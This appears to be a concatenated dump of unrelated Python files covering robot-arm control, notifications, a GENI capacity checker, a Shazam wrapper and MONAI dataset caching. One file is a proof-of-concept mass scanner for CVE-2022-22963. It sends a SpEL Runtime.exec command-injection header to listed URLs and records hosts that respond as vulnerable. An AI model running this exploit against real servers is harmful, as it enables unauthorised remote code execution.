    # NOTE(review): the duration_timeout branch below duplicates this branch
    # almost verbatim, differing only in publishing from a worker thread; the
    # two halves must be kept in sync when edited.
    if duration_timeout is None:
        if collision_check is False:
            # Blocking publish for the full duration, no pre-check.
            try:
                publishCatesianVelocityCommands(command, duration)
                return 1
            except Exception as e:
                print(e)
                return -1
        else:
            # Predict the end pose by linearly integrating the commanded
            # velocity from the current tool pose.
            curr_pose = rospy.wait_for_message("/j2s7s300_driver/out/tool_pose", PoseStamped)
            curr_pose_orig = copy.copy(curr_pose)
            curr_pose = np.array([curr_pose.pose.position.x, curr_pose.pose.position.y, curr_pose.pose.position.z, \
                curr_pose.pose.orientation.x, curr_pose.pose.orientation.y, curr_pose.pose.orientation.z])
            displacement = curr_pose + duration*np.array(command)
            print(displacement)
            # Ask MoveIt's IK service whether the predicted pose is reachable
            # and collision-free; its error codes drive the return value.
            rospy.wait_for_service('compute_ik')
            compute_ik = rospy.ServiceProxy('compute_ik', moveit_msgs.srv.GetPositionIK)
            print("GOOOOOOOOOOOOOOOOOOOOOOOO")
            goal_stamped = geometry_msgs.msg.PoseStamped()
            goal_stamped.header = std_msgs.msg.Header(frame_id=("j2s7s300_" + 'link_base'))
            goal_stamped.pose.position = geometry_msgs.msg.Point(
                x=displacement[0], y=displacement[1], z=displacement[2])
            # NOTE(review): only x/y/z of the quaternion are populated (w left
            # at its default) and displacement[3:6] are integrated orientation
            # components, not a normalized quaternion -- confirm this matches
            # what the IK service expects.
            goal_stamped.pose.orientation = geometry_msgs.msg.Quaternion(
                x=displacement[3], y=displacement[4], z=displacement[5])
            msgs_request = moveit_msgs.msg.PositionIKRequest()
            msgs_request.group_name = "arm"
            msgs_request.pose_stamped = goal_stamped
            msgs_request.robot_state.is_diff = True
            msgs_request.timeout.secs = 2
            msgs_request.avoid_collisions = True
            msgs_request.ik_link_names = ["j2s7s300_joint_1", "j2s7s300_joint_2", "j2s7s300_joint_3", "j2s7s300_joint_4",
                "j2s7s300_joint_5", "j2s7s300_joint_6", "j2s7s300_joint_7"]
            # msgs_request.robot_state = self.robot.get_current_state()
            try:
                jointAngle=compute_ik(msgs_request)
                ans=list(jointAngle.solution.joint_state.position)[2:9]
                ans = simplify_joints(ans)
                print(jointAngle)
                if jointAngle.error_code.val == -31:
                    print('No IK solution')
                    return -31
                if (jointAngle.error_code.val == -12 or jointAngle.error_code.val==-10):
                    print("Goal or current position is in collision")
                    return -12
            except rospy.ServiceException as e:
                # NOTE(review): an IK service failure is logged but does NOT
                # abort -- the velocity command is still published below.
                print("Service call failed: %s"%e)
            try:
                publishCatesianVelocityCommands(command, duration)
                return 1
            except Exception as e:
                print(e)
                return -1
    else:
        # Non-blocking variant: publish from a worker thread and return after
        # duration_timeout seconds (thread keeps publishing until `duration`).
        cart_thread = threading.Thread(target=publishCatesianVelocityCommands, args=(command, duration, "j2s7s300_",))
        if collision_check is False:
            try:
                cart_thread.start()
                time.sleep(duration_timeout)
                return 1
            except:
                return -1
        else:
            curr_pose = rospy.wait_for_message("/j2s7s300_driver/out/tool_pose", PoseStamped)
            curr_pose = np.array([curr_pose.pose.position.x, curr_pose.pose.position.y, curr_pose.pose.position.z, \
                curr_pose.pose.orientation.x, curr_pose.pose.orientation.y, curr_pose.pose.orientation.z])
            displacement = curr_pose + duration*np.array(command)
            rospy.wait_for_service('compute_ik')
            compute_ik = rospy.ServiceProxy('compute_ik', moveit_msgs.srv.GetPositionIK)
            goal_stamped = geometry_msgs.msg.PoseStamped()
            goal_stamped.header = std_msgs.msg.Header(frame_id=("j2s7s300_" + 'link_base'))
            goal_stamped.pose.position = geometry_msgs.msg.Point(
                x=displacement[0], y=displacement[1], z=displacement[2])
            # NOTE(review): here w IS explicitly set to 0.0, unlike the branch
            # above -- confirm the inconsistency is intentional.
            goal_stamped.pose.orientation = geometry_msgs.msg.Quaternion(
                x=displacement[3], y=displacement[4], z=displacement[5], w=0.0)
            msgs_request = moveit_msgs.msg.PositionIKRequest()
            msgs_request.group_name = "arm"
            msgs_request.pose_stamped = goal_stamped
            msgs_request.robot_state.is_diff = True
            msgs_request.timeout.secs = 2
            msgs_request.avoid_collisions = True
            msgs_request.ik_link_names = ["j2s7s300_joint_1", "j2s7s300_joint_2", "j2s7s300_joint_3", "j2s7s300_joint_4",
                "j2s7s300_joint_5", "j2s7s300_joint_6", "j2s7s300_joint_7"]
            # msgs_request.robot_state = self.robot.get_current_state()
            try:
                jointAngle=compute_ik(msgs_request)
                ans=list(jointAngle.solution.joint_state.position)[2:9]
                ans = simplify_joints(ans)
                if jointAngle.error_code.val == -31:
                    print('No IK solution')
                    return -31
                if (jointAngle.error_code.val == -12 or jointAngle.error_code.val==-10):
                    print("Goal or current position is in collision")
                    return -12
            except rospy.ServiceException as e:
                print("Service call failed: %s"%e)
            try:
                cart_thread.start()
                time.sleep(duration_timeout)
                return 1
            except:
                return -1
def simplify_angle(angle):
    """Wrap *angle* (radians) into the interval [-pi, pi] by adding or
    subtracting whole turns as needed."""
    full_turn = 2 * math.pi
    while angle > math.pi:
        angle -= full_turn
    while angle < -math.pi:
        angle += full_turn
    return angle
def simplify_joints(joints, group_id=0):
    """Normalize continuous joint angles into [-pi, pi].

    Args:
        joints: either a dict mapping joint names to angles, or a list of
            angles ordered as j2s7s300 joints 1-7.
        group_id: unused; kept for interface compatibility.

    Returns:
        The same container type, with continuous joints wrapped via
        simplify_angle() and all other entries passed through unchanged.

    Raises:
        TypeError: if *joints* is neither a list nor a dict.
    """
    if isinstance(joints, dict):
        # Every named joint is treated as continuous and wrapped.
        simplified_joints = {joint: simplify_angle(angle) for joint, angle in joints.items()}
    elif isinstance(joints, list):
        full_names = ["j2s7s300_joint_1", "j2s7s300_joint_2", "j2s7s300_joint_3",
                      "j2s7s300_joint_4", "j2s7s300_joint_5", "j2s7s300_joint_6",
                      "j2s7s300_joint_7"]
        # Strip the robot prefix from each name. BUG FIX: the original passed
        # the bare map() iterator to .index(), which fails on Python 3 --
        # materialize a list instead.
        joint_order = ["_".join(name.split("_")[1:]) for name in full_names]
        continuous_joint_indices = [joint_order.index(j) for j in
                                    ["joint_1", "joint_2", "joint_3", "joint_4",
                                     "joint_5", "joint_6", "joint_7"]]
        simplified_joints = []
        for i, angle in enumerate(joints):
            if i in continuous_joint_indices:
                simplified_joints.append(simplify_angle(angle))
            else:
                simplified_joints.append(angle)
    else:
        rospy.logerr("Joints must be provided as a list or dictionary")
        raise TypeError("Joints must be provided as a list or dictionary")
    return simplified_joints
if __name__ == '__main__':
    #args = argumentParser(None)
    # Standalone use: configure the j2s7s300 globals, start the ROS node and
    # snapshot the current Cartesian command so relative moves have a baseline.
    kinova_robotTypeParser("j2s7s300")
    rospy.init_node(prefix + 'pose_action_client')
    getcurrentCartesianCommand(prefix)
|
notifier_group.py | import threading
class NotifierGroup(object):
    """Fan-out dispatcher that forwards a notification to named notifiers.

    Notifier failures are logged but never propagated, so one misbehaving
    notifier cannot prevent the others from firing.
    """

    def __init__(self, logger):
        # logger: any object with a warning() method, used to report failures.
        self._logger = logger
        self._notifiers = {}

    def add_notifier(self, name, notifier):
        """Register (or replace) *notifier* under *name*."""
        self._notifiers[name] = notifier

    def get_notifiers(self, limit=None):
        """Return registered notifiers, optionally restricted to names in *limit*.

        A falsy *limit* (None or empty) means "all notifiers"; unknown names
        are silently ignored.
        """
        # BUG FIX: the original used a mutable default argument (limit=[]);
        # None is the safe equivalent and behaves identically.
        if limit:
            return [self._notifiers[name] for name in limit if name in self._notifiers]
        return list(self._notifiers.values())

    def notify(self, title, message, retry_forever=False, limit=None):
        """Send *title*/*message* through every selected notifier."""
        for notifier in self.get_notifiers(limit):
            if retry_forever:
                # These notifications could go on forever and never actually
                # trigger, so each runs in its own daemon thread to give every
                # notifier a chance to succeed. Non-retrying notifiers time out
                # after three failed attempts, so they can safely run inline.
                notifier_thread = threading.Thread(
                    target=self._notify,
                    args=(notifier, title, message, retry_forever),
                    daemon=True,
                )
                notifier_thread.start()
            else:
                self._notify(notifier, title, message, retry_forever)

    def _notify(self, notifier, title, message, retry_forever):
        """Invoke one notifier, logging (never propagating) any failure."""
        try:
            notifier.notify(title, message, retry_forever)
        except BaseException as e:
            # Deliberately broad: a notifier must not take down the group.
            # BUG FIX: logger.warn() is deprecated; use warning().
            self._logger.warning("Fatal error while running {0} notifier: {1}".format(notifier.__class__.__name__, e))
|
checkvmavail.py | # Copyright (c) 2014 Barnstormer Softworks, Ltd.
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import multiprocessing as MP
import time
import geni.aggregate.instageni as IG
import geni.util
# Load GENI credentials at import time; key_passphrase=True makes loadContext
# prompt for the key passphrase (interactive side effect on import).
context = geni.util.loadContext(key_passphrase = True)
# Xen-VM usage count (of a 57-slot host, see do_parallel) at or above which a
# node is reported as overloaded.
OVERLOAD = 43
def query_aggregate(context, site, q):
    """Query one InstaGENI aggregate for its shared-VM capacity.

    Puts a ``(site.name, rows)`` tuple on *q*, where rows is a list of
    ``(component_id, advertised_pcvm_count, "Xen"|"OpenVZ")`` tuples for every
    non-exclusive node, or ``["OFFLINE"]`` if the aggregate failed to answer.
    Designed to run in a worker process (see do_parallel).
    """
    try:
        res = []
        ad = site.listresources(context)
        for node in ad.nodes:
            if node.exclusive:
                continue  # only shared (VM-hosting) nodes are of interest
            try:
                capacity = node.hardware_types["pcvm"]
                if "emulab-xen" in node.sliver_types:
                    res.append((node.component_id, capacity, "Xen"))
                else:
                    res.append((node.component_id, capacity, "OpenVZ"))
            except Exception:
                # BUG FIX: bare except narrowed; skip nodes without a "pcvm"
                # hardware type (or with a malformed advertisement).
                continue
        q.put((site.name, res))
    except Exception:
        # Aggregate unreachable or listresources() failed entirely.
        q.put((site.name, ["OFFLINE"]))
def do_parallel ():
    # NOTE: this file is Python 2 (print statements below).
    # Launch one subprocess per InstaGENI aggregate so slow/offline sites are
    # queried concurrently; results come back through a shared queue.
    q = MP.Queue()
    for site in IG.aggregates():
        p = MP.Process(target=query_aggregate, args=(context, site, q))
        p.start()
    # Wait for every worker to exit before draining the queue.
    # NOTE(review): polling active_children()+q.empty() can in principle miss
    # items still being flushed by a just-exited process -- confirm acceptable.
    while MP.active_children():
        time.sleep(0.5)
    l = []
    while not q.empty():
        l.append(q.get())
    # Running totals: Xen hosts are assumed to have 57 VM slots, OpenVZ 100.
    xen_used = xen_avail = xen_total = 0
    vz_avail = vz_total = 0
    overload_cids = []
    underload_cids = []
    for idx,pair in enumerate(l):
        site_vz = site_xen = 0
        entries = []
        (site_name, res) = pair
        try:
            for (cid, count, typ) in res:
                if typ == "Xen":
                    # "count" is the advertised free pcvm capacity; usage is
                    # derived from the fixed 57-slot Xen host size.
                    used = 57 - int(count)
                    site_xen += used
                    if used >= OVERLOAD:
                        overload_cids.append((cid, used))
                    else:
                        underload_cids.append((cid, used))
                    xen_avail += int(count)
                    xen_used += used
                    xen_total += 57
                elif typ == "OpenVZ":
                    site_vz += 100 - int(count)
                    vz_avail += int(count)
                    vz_total += 100
                entries.append(" [%s] %s/57 (%s)" % (cid, count, typ))
        except Exception:
            # res is ["OFFLINE"] (or malformed); dump it as-is for diagnosis.
            print res
        print "%02d %s (Used: %d Xen, %d OpenVZ)" % (idx+1, site_name, site_xen, site_vz)
        for entry in entries:
            print entry
    # Summary across all aggregates.
    print "Used"
    print "----"
    print "OpenVZ: %d/%d" % (vz_avail, vz_total)
    print "Xen: %d/%d" % (xen_used, xen_total)
    print
    print "Overloaded hosts: %d" % (len(overload_cids))
    print "Underloaded hosts: %d" % (len(underload_cids))
    for cid,used in overload_cids:
        print "%02d - %s" % (used, cid)
if __name__ == '__main__':
    # Entry point: query all aggregates in parallel and print the usage report.
    do_parallel()
|
shazi.py | #shazi.py
from ShazamAPI import Shazam
from threading import Thread
import traceback
from pydub import AudioSegment
import time
# class Shazi(object):
'''
None-blocking function to get title, artist, and other shazam data from a file
'''
def shazam(mp3path, outDict = None, checkFull = False):
    """Kick off Shazam recognition of *mp3path* in a background thread.

    Returns immediately with *outDict*; the worker thread fills it in
    ("out" always, plus "title"/"artist" on success) as results arrive.
    When checkFull is True the whole file is sent, otherwise a short
    excerpt is recognized.
    """
    if outDict is None:
        outDict = {"out": None}
    # shazamAsync expects a single packed argument list.
    worker = Thread(target=shazamAsync, args=[[mp3path, outDict, checkFull]])
    worker.start()
    return outDict
def shazamAsync(data, round = 0):
    """Worker body for shazam(): recognize the track in a (possibly trimmed) mp3.

    data: packed [mp3path, outDict, checkFull] list (matches the Thread args
        built by shazam()).
    round: unused. NOTE(review): it also shadows the builtin -- confirm it
        can be removed.
    """
    print('''%%%%%%%%%%% SHAZAMMING %%%%%%%%%%%''')
    print('''%%%%%%%%%%% SHAZAMMING %%%%%%%%%%%''')
    print('''%%%%%%%%%%% SHAZAMMING %%%%%%%%%%%''')
    t = time.time()
    try:
        mp3path, outDict, checkFull = data
        if checkFull:
            # NOTE(review): this file handle is never closed -- leaks on
            # repeated calls.
            mp3_file_content_to_recognize = open(mp3path, 'rb').read()
        else:
            audio = AudioSegment.from_mp3(mp3path)
            mp3_file_content_to_recognize = audio.export(format="mp3").read()
            start = 0
            seconds = 1.2
            length = len(audio)
            # NOTE(review): len(audio) is in milliseconds, so "length > seconds"
            # compares ms to seconds and is effectively always true; likewise
            # the slice below indexes raw mp3 BYTES with minute-based
            # arithmetic. Preserved as-is -- confirm intent before changing.
            if length > 0:
                if length > seconds:
                    seconds = seconds
                else:
                    seconds = length/1000
            mp3_file_content_to_recognize = mp3_file_content_to_recognize[start*60*1000:int((start+seconds)*60*1000)]
        # Take the first yielded result from the recognizer generator.
        outDict["out"] = next(Shazam(mp3_file_content_to_recognize).recognizeSong())
        if outDict is not None:
            firstRes = None
            try:
                # NOTE(review): prints None (firstRes not yet assigned) --
                # looks like a debug leftover.
                print(firstRes)
                firstRes = outDict["out"][1]["track"]
            except:
                print("EEEEE SHAZAM COULD NOT FIND SONG")
                traceback.print_exc()
            if firstRes is not None and "title" in firstRes and "subtitle" in firstRes:
                outDict["title"] = firstRes["title"]
                outDict["artist"] = firstRes["subtitle"]
                print(outDict["title"] + " - " + outDict["artist"])
        print('''%%%%%%%%%%% DONE! %%%%%%%%%%%''', "time",time.time()-t)
    except:
        traceback.print_exc()
|
poc-CVE-2022-22963.py | import requests
import sys
import threading
import urllib3
urllib3.disable_warnings()
def scan(txt, cmd):
    """Probe each URL listed in file *txt* for CVE-2022-22963 (Spring Cloud
    Function SpEL injection) by sending *cmd* in the routing-expression header.

    Targets answering 500 with the characteristic error body are reported as
    vulnerable and appended to vulnerable.txt.
    """
    payload=f'T(java.lang.Runtime).getRuntime().exec("{cmd}")'
    data ='test'
    headers = {
        'spring.cloud.function.routing-expression':payload,
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Accept-Language': 'en',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    path = '/functionRouter'
    # BUG FIX: the input file was never closed; use a context manager.
    with open(txt) as f:
        urllist = f.readlines()
    for url in urllist :
        url = url.strip('\n')
        # Renamed from "all" (shadowed the builtin).
        target = url + path
        try:
            req=requests.post(url=target,headers=headers,data=data,verify=False,timeout=3)
            code =req.status_code
            text = req.text
            rsp = '"error":"Internal Server Error"'
            if code == 500 and rsp in text:
                print ( f'[+] { url } is vulnerable' )
                # BUG FIX: open/close via context manager so the results file
                # is closed even if write() fails.
                with open('vulnerable.txt', 'a+') as poc_file:
                    poc_file.write(url + '\n')
            else:
                print ( f'[-] { url } not vulnerable' )
        except requests.exceptions.RequestException:
            print ( f'[-] { url } detection timed out' )
            continue
        except Exception:
            # BUG FIX: bare except narrowed to Exception; still broad so one
            # bad URL cannot abort the whole scan.
            print ( f'[-] { url } error' )
            continue
if __name__ == '__main__' :
    try:
        cmd1 =sys.argv[1]
        # BUG FIX: the original called scan(...) immediately and handed its
        # return value (None) to Thread as the target, so the thread itself
        # did nothing. Pass the callable and its arguments separately.
        t = threading.Thread(target=scan, args=(cmd1, 'whoami'))
        t.start()
    except IndexError:
        # No URL file supplied on the command line.
        print ( 'Usage:' )
        print('python poc.py url.txt')
|
dataset.py | # Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import pickle
import sys
import threading
import time
import warnings
from copy import deepcopy
from multiprocessing.pool import ThreadPool
from pathlib import Path
from typing import TYPE_CHECKING, Any, Callable, List, Optional, Sequence, Union
import torch
from torch.utils.data import Dataset as _TorchDataset
from monai.data.utils import pickle_hashing
from monai.transforms import Compose, Randomizable, Transform, apply_transform
from monai.transforms.transform import RandomizableTransform
from monai.utils import MAX_SEED, get_seed, min_version, optional_import
if TYPE_CHECKING:
from tqdm import tqdm
has_tqdm = True
else:
tqdm, has_tqdm = optional_import("tqdm", "4.47.0", min_version, "tqdm")
lmdb, _ = optional_import("lmdb")
class Dataset(_TorchDataset):
    """A minimal map-style dataset: wraps a sequence of samples and optionally
    applies a callable transform whenever an item is fetched.

    Typical input data is a list of dictionaries, e.g.::

        [{'img': 'image1.nii.gz', 'seg': 'label1.nii.gz', 'extra': 123},
         {'img': 'image2.nii.gz', 'seg': 'label2.nii.gz', 'extra': 456},
         {'img': 'image3.nii.gz', 'seg': 'label3.nii.gz', 'extra': 789}]
    """

    def __init__(self, data: Sequence, transform: Optional[Callable] = None) -> None:
        """
        Args:
            data: the sequence of samples backing this dataset.
            transform: optional callable applied to each sample on access.
        """
        self.data = data
        self.transform = transform

    def __len__(self) -> int:
        return len(self.data)

    def __getitem__(self, index: int):
        item = self.data[index]
        if self.transform is None:
            return item
        return apply_transform(self.transform, item)
class PersistentDataset(Dataset):
    """
    Persistent storage of pre-computed values to efficiently manage larger than memory dictionary format data,
    it can operate transforms for specific fields. Results from the non-random transform components are computed
    when first used, and stored in the `cache_dir` for rapid retrieval on subsequent uses.

    For example, typical input data can be a list of dictionaries::

        [{'img': 'image1.nii.gz', 'seg': 'label1.nii.gz', 'extra': 123},
         {'img': 'image2.nii.gz', 'seg': 'label2.nii.gz', 'extra': 456},
         {'img': 'image3.nii.gz', 'seg': 'label3.nii.gz', 'extra': 789}]

    For a composite transform like

    .. code-block:: python

        [ LoadImaged(keys=['image', 'label']),
          Orientationd(keys=['image', 'label'], axcodes='RAS'),
          ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True),
          RandCropByPosNegLabeld(keys=['image', 'label'], label_key='label', spatial_size=(96, 96, 96),
                                 pos=1, neg=1, num_samples=4, image_key='image', image_threshold=0),
          ToTensord(keys=['image', 'label'])]

    Upon first use a filename based dataset will be processed by the transform for the
    [LoadImaged, Orientationd, ScaleIntensityRanged] and the resulting tensor written to
    the `cache_dir` before applying the remaining random dependant transforms
    [RandCropByPosNegLabeld, ToTensord] elements for use in the analysis.
    Subsequent uses of a dataset directly read pre-processed results from `cache_dir`
    followed by applying the random dependant parts of transform processing.

    Note:
        The input data must be a list of file paths and will hash them as cache keys.
    """

    def __init__(
        self,
        data: Sequence,
        transform: Union[Sequence[Callable], Callable],
        cache_dir: Optional[Union[Path, str]] = None,
        hash_func: Callable[..., bytes] = pickle_hashing,
    ) -> None:
        """
        Args:
            data: input data file paths to load and transform to generate dataset for model.
                `PersistentDataset` expects input data to be a list of serializable
                and hashes them as cache keys using `hash_func`.
            transform: transforms to execute operations on input data.
            cache_dir: If specified, this is the location for persistent storage
                of pre-computed transformed data tensors. The cache_dir is computed once, and
                persists on disk until explicitly removed. Different runs, programs, experiments
                may share a common cache dir provided that the transforms pre-processing is consistent.
                If the cache_dir doesn't exist, will automatically create it.
            hash_func: a callable to compute hash from data items to be cached.
                defaults to `monai.data.utils.pickle_hashing`.
        """
        # Wrap bare callables/sequences so the deterministic-vs-random split
        # in _pre_transform/_post_transform can inspect individual transforms.
        if not isinstance(transform, Compose):
            transform = Compose(transform)
        super().__init__(data=data, transform=transform)
        self.cache_dir = Path(cache_dir) if cache_dir is not None else None
        self.hash_func = hash_func
        if self.cache_dir is not None:
            if not self.cache_dir.exists():
                self.cache_dir.mkdir(parents=True)
            if not self.cache_dir.is_dir():
                raise ValueError("cache_dir must be a directory.")

    def _pre_transform(self, item_transformed):
        """
        Process the data from original state up to the first random element.

        Args:
            item_transformed: The data to be transformed

        Returns:
            the transformed element up to the first identified
            random transform object
        """
        if not isinstance(self.transform, Compose):
            raise ValueError("transform must be an instance of monai.transforms.Compose.")
        for _transform in self.transform.transforms:
            # execute all the deterministic transforms
            # (stop at the first random transform, or at any non-Transform
            # callable, whose output must not be cached)
            if isinstance(_transform, RandomizableTransform) or not isinstance(_transform, Transform):
                break
            item_transformed = apply_transform(_transform, item_transformed)
        return item_transformed

    def _post_transform(self, item_transformed):
        """
        Process the data from before the first random transform to the final state ready for evaluation.

        Args:
            item_transformed: The data to be transformed (already processed up to the first random transform)

        Returns:
            the transformed element through the random transforms
        """
        if not isinstance(self.transform, Compose):
            raise ValueError("transform must be an instance of monai.transforms.Compose.")
        start_post_randomize_run = False
        for _transform in self.transform.transforms:
            # Once the first random (or non-Transform) element is seen, this
            # and every subsequent transform is applied.
            if (
                start_post_randomize_run
                or isinstance(_transform, RandomizableTransform)
                or not isinstance(_transform, Transform)
            ):
                start_post_randomize_run = True
                item_transformed = apply_transform(_transform, item_transformed)
        return item_transformed

    def _cachecheck(self, item_transformed):
        """
        A function to cache the expensive input data transform operations
        so that huge data sets (larger than computer memory) can be processed
        on the fly as needed, and intermediate results written to disk for
        future use.

        Args:
            item_transformed: The current data element to be mutated into transformed representation

        Returns:
            The transformed data_element, either from cache, or explicitly computing it.

        Warning:
            The current implementation does not encode transform information as part of the
            hashing mechanism used for generating cache names. If the transforms applied are
            changed in any way, the objects in the cache dir will be invalid. The hash for the
            cache is ONLY dependant on the input filename paths.
        """
        hashfile = None
        if self.cache_dir is not None:
            data_item_md5 = self.hash_func(item_transformed).decode("utf-8")
            hashfile = self.cache_dir / f"{data_item_md5}.pt"
        if hashfile is not None and hashfile.is_file():  # cache hit
            return torch.load(hashfile)
        # Cache miss: run the deterministic transforms on a deep copy so the
        # original (hashed) item is left untouched.
        _item_transformed = self._pre_transform(deepcopy(item_transformed))  # keep the original hashed
        if hashfile is not None:
            # NOTE: Writing to ".temp_write_cache" and then using a nearly atomic rename operation
            #       to make the cache more robust to manual killing of parent process
            #       which may leave partially written cache files in an incomplete state
            temp_hash_file = hashfile.with_suffix(".temp_write_cache")
            torch.save(_item_transformed, temp_hash_file)
            temp_hash_file.rename(hashfile)
        return _item_transformed

    def __getitem__(self, index: int):
        # Cached deterministic part first, then the random tail transforms.
        pre_random_item = self._cachecheck(self.data[index])
        return self._post_transform(pre_random_item)
class CacheNTransDataset(PersistentDataset):
    """`PersistentDataset` variant that caches the output of the first
    `cache_n_trans` transforms, regardless of whether they are random.
    """

    def __init__(
        self,
        data: Sequence,
        transform: Union[Sequence[Callable], Callable],
        cache_n_trans: int,
        cache_dir: Optional[Union[Path, str]] = None,
        hash_func: Callable[..., bytes] = pickle_hashing,
    ) -> None:
        """
        Args:
            data: input data file paths to load and transform to generate dataset for model.
                `PersistentDataset` expects input data to be a list of serializable
                and hashes them as cache keys using `hash_func`.
            transform: transforms to execute operations on input data.
            cache_n_trans: how many leading transforms to cache the result of.
            cache_dir: location for persistent storage of pre-computed
                transformed data tensors; computed once and kept on disk until
                explicitly removed. May be shared across runs as long as the
                cached pre-processing is consistent. Created automatically if
                it does not exist.
            hash_func: a callable to compute hash from data items to be cached.
                defaults to `monai.data.utils.pickle_hashing`.
        """
        super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func)
        self.cache_n_trans = cache_n_trans

    def _pre_transform(self, item_transformed):
        """Apply the first `cache_n_trans` transforms (the cached portion)."""
        if not isinstance(self.transform, Compose):
            raise ValueError("transform must be an instance of monai.transforms.Compose.")
        for index, _transform in enumerate(self.transform.transforms):
            if index == self.cache_n_trans:
                break
            item_transformed = apply_transform(_transform, item_transformed)
        return item_transformed

    def _post_transform(self, item_transformed):
        """Apply every transform from index `cache_n_trans` onwards."""
        if not isinstance(self.transform, Compose):
            raise ValueError("transform must be an instance of monai.transforms.Compose.")
        for index, _transform in enumerate(self.transform.transforms):
            if index < self.cache_n_trans:
                continue  # already covered by the cached _pre_transform pass
            item_transformed = apply_transform(_transform, item_transformed)
        return item_transformed
class LMDBDataset(PersistentDataset):
    """
    Extension of `PersistentDataset` using LMDB as the backend.

    See Also:
        :py:class:`monai.data.PersistentDataset`

    Examples:
        >>> items = [{"data": i} for i in range(5)]
        # [{'data': 0}, {'data': 1}, {'data': 2}, {'data': 3}, {'data': 4}]
        >>> lmdb_ds = monai.data.LMDBDataset(items, transform=monai.transforms.SimulateDelayd("data", delay_time=1))
        >>> print(list(lmdb_ds))  # using the cached results
    """

    def __init__(
        self,
        data: Sequence,
        transform: Union[Sequence[Callable], Callable],
        cache_dir: Union[Path, str] = "cache",
        hash_func: Callable[..., bytes] = pickle_hashing,
        db_name: str = "monai_cache",
        progress: bool = True,
        pickle_protocol=pickle.HIGHEST_PROTOCOL,
        lmdb_kwargs: Optional[dict] = None,
    ) -> None:
        """
        Args:
            data: input data file paths to load and transform to generate dataset for model.
                `LMDBDataset` expects input data to be a list of serializable
                and hashes them as cache keys using `hash_func`.
            transform: transforms to execute operations on input data.
            cache_dir: if specified, this is the location for persistent storage
                of pre-computed transformed data tensors. The cache_dir is computed once, and
                persists on disk until explicitly removed. Different runs, programs, experiments
                may share a common cache dir provided that the transforms pre-processing is consistent.
                If the cache_dir doesn't exist, will automatically create it. Defaults to "./cache".
            hash_func: a callable to compute hash from data items to be cached.
                defaults to `monai.data.utils.pickle_hashing`.
            db_name: lmdb database file name. Defaults to "monai_cache".
            progress: whether to display a progress bar.
            pickle_protocol: pickle protocol version. Defaults to pickle.HIGHEST_PROTOCOL.
                https://docs.python.org/3/library/pickle.html#pickle-protocols
            lmdb_kwargs: additional keyword arguments to the lmdb environment.
                for more details please visit: https://lmdb.readthedocs.io/en/release/#environment-class
        """
        super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func)
        self.progress = progress
        if not self.cache_dir:
            raise ValueError("cache_dir must be specified.")
        self.db_file = self.cache_dir / f"{db_name}.lmdb"
        self.pickle_protocol = pickle_protocol
        self.lmdb_kwargs = lmdb_kwargs or {}
        if not self.lmdb_kwargs.get("map_size", 0):
            self.lmdb_kwargs["map_size"] = 1024 ** 4  # default map_size (1 TB virtual; grown lazily by the OS)
        # Lazily created read-only environment; populated on first access.
        self._read_env = None
        print(f"Accessing lmdb file: {self.db_file.absolute()}.")

    def _fill_cache_start_reader(self):
        # create cache: open writable, insert every missing item, then reopen
        # the environment read-only for fast concurrent access.
        self.lmdb_kwargs["readonly"] = False
        env = lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
        if self.progress and not has_tqdm:
            warnings.warn("LMDBDataset: tqdm is not installed. not displaying the caching progress.")
        for item in tqdm(self.data) if has_tqdm and self.progress else self.data:
            key = self.hash_func(item)
            done, retry, val = False, 5, None
            # Retry loop: each MapFullError doubles the map size (at most 5 times).
            while not done and retry > 0:
                try:
                    with env.begin(write=True) as txn:
                        with txn.cursor() as cursor:
                            done = cursor.set_key(key)
                            if done:
                                continue  # key already cached; skip transform
                    if val is None:
                        # Transform once and reuse `val` across resize retries.
                        val = self._pre_transform(deepcopy(item))  # keep the original hashed
                        val = pickle.dumps(val, protocol=self.pickle_protocol)
                    with env.begin(write=True) as txn:
                        txn.put(key, val)
                    done = True
                except lmdb.MapFullError:
                    done, retry = False, retry - 1
                    size = env.info()["map_size"]
                    new_size = size * 2
                    warnings.warn(f"Resizing the cache database from {int(size) >> 20}MB to {int(new_size) >> 20}MB.")
                    env.set_mapsize(new_size)
            if not done:  # still has the map full error
                size = env.info()["map_size"]
                env.close()
                raise ValueError(f"LMDB map size reached, increase size above current size of {size}.")
        size = env.info()["map_size"]
        env.close()
        # read-only database env
        self.lmdb_kwargs["readonly"] = True
        self.lmdb_kwargs["map_size"] = size
        if self.lmdb_kwargs.get("lock", None) is None:
            self.lmdb_kwargs["lock"] = False
        if self.lmdb_kwargs.get("readahead", None) is None:
            self.lmdb_kwargs["readahead"] = False
        return lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)

    def _cachecheck(self, item_transformed):
        """
        if the item is not found in the lmdb file, resolves to the persistent cache default behaviour.
        """
        if self._read_env is None:
            self._read_env = self._fill_cache_start_reader()
        with self._read_env.begin(write=False) as txn:
            data = txn.get(self.hash_func(item_transformed))
        if data is None:
            warnings.warn("LMDBDataset: cache key not found, running fallback caching.")
            return super()._cachecheck(item_transformed)
        try:
            return pickle.loads(data)
        except Exception as err:
            raise RuntimeError("Invalid cache value, corrupted lmdb file?") from err

    def info(self):
        """
        Returns: dataset info dictionary.
        """
        if self._read_env is None:
            self._read_env = self._fill_cache_start_reader()
        out = dict(self._read_env.info())
        out["size"] = len(self.data)
        out["filename"] = f"{self.db_file.absolute()}"
        return out
class CacheDataset(Dataset):
    """
